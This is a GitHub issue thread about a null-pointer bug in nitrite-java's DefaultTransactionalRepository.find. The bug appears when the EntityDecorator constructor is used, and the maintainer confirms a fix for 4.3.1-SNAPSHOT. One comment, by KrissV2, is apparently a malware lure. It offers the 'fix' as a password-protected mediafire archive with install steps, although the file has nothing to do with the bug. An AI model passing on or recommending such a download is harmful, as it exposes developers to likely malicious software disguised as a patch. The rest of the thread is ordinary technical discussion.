### ISSUE TITLE
DefaultTransactionalRepository find throws exception if EntityDecorator constructor used

### ISSUE THREAD

**Issue by dmccabe** [nitrite/nitrite-java#1032]
`DefaultTransactionalRepository` has two constructors, one that takes a `Class<T>` and one that takes an `EntityDecorator`. When the `EntityDecorator` constructor is used, the `type` value is initialized to `null` by default.

However, in the `find` method of the repository, the `type` value is passed into `operations.find`:

```java
@Override
public Cursor<T> find(Filter filter, FindOptions findOptions) {
    return operations.find(filter, findOptions, type);
}
```

This will eventually work its way down to `NitriteMapper`, which causes an NPE to be thrown in the Nitrite mapper. I was seeing it happen in `SimpleNitriteMapper` on `Document.class.isAssignableFrom(type)`, but it would presumably affect the other mappers as well.

I believe the appropriate fix here is to update `DefaultTransactionalRepository.find` to see if it has a non-null `entityDecorator` and fetch the type from there if it's present.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by anidotnet** [comment]
You are right  to point it out. It is indeed a bug. Fix is on the way to 4.3.1-SNAPSHOT

**Comment by dmccabe** [comment]
Appreciate the quick response and resolution @anidotnet! You rock.
